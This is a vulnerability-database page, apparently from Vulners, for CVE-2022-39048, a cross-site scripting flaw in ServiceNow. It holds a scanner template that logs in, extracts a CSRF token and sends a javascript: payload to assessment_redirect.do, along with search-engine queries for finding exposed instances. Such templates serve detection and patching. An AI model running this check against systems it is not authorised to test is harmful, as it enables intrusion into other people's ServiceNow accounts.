| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2022-39048 | 10 Apr 202318:32 | – | circl | |
| ServiceNow UI 跨站脚本漏洞 | 10 Apr 202300:00 | – | cnnvd | |
| CVE-2022-39048 | 10 Apr 202300:00 | – | cve | |
| CVE-2022-39048 Cross-Site Scripting (XSS) vulnerability in ServiceNow UI page assessment_redirect | 10 Apr 202300:00 | – | cvelist | |
| CVE-2022-39048 | 10 Apr 202314:15 | – | nvd | |
| CVE-2022-39048 | 10 Apr 202314:15 | – | osv | |
| Cross site scripting | 10 Apr 202314:15 | – | prion | |
| PT-2023-13678 · Servicenow · Servicenow | 10 Apr 202300:00 | – | ptsecurity | |
| CVE-2022-39048 | 22 May 202522:09 | – | redhatcve | |
| CVE-2022-39048 Cross-Site Scripting (XSS) vulnerability in ServiceNow UI page assessment_redirect | 10 Apr 202300:00 | – | vulnrichment |
id: CVE-2022-39048
info:
name: ServiceNow - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
A XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems.
impact: |
Authenticated attackers can craft malicious URLs with JavaScript in the sysparm_survey_url parameter that executes when victims click the link, potentially stealing CSRF tokens, session cookies, or conducting phishing attacks to compromise ServiceNow authenticated users.
remediation: |
Update ServiceNow to the latest patched version that properly sanitizes the sysparm_survey_url parameter in assessment_redirect.do.
reference:
- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1221892
- https://blog.amanrawat.in/2023/05/05/CVE-2022-39048.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-39048
- https://support.servicenow.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-39048
cwe-id: CWE-79
epss-score: 0.01089
epss-percentile: 0.6132
cpe: cpe:2.3:a:servicenow:servicenow:quebec:-:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: servicenow
product: servicenow
shodan-query:
- http.title:"ServiceNow"
- http.title:"servicenow"
- http.favicon.hash:1701804003
fofa-query:
- title="servicenow"
- icon_hash=1701804003
google-query: intitle:"servicenow"
tags: cve,cve2022,xss,servicenow,authenticated,vuln
http:
- raw:
- |
GET /navpage.do HTTP/1.1
Host: {{Hostname}}
- |
POST /login.do HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}¬_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do
- |
GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- 'unwrapped_url = "javascript:alert(document.domain)//assessment_take2.do"'
- 'assessment_list.do'
condition: and
- type: word
part: header_3
words:
- 'text/html'
- type: status
part: header_3
status:
- 200
extractors:
- type: regex
name: csrf
part: body
group: 1
regex:
- 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"'
internal: true
# digest: 4a0a0047304502201b8b1ed0c9c0c5ad2d9af4f851d382e6bc893217be2ebeb5383c62fa1697023e022100faf3969f60368ab01abcde0eb4970aab58fc026d45837e8fe53f975bdc69548c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation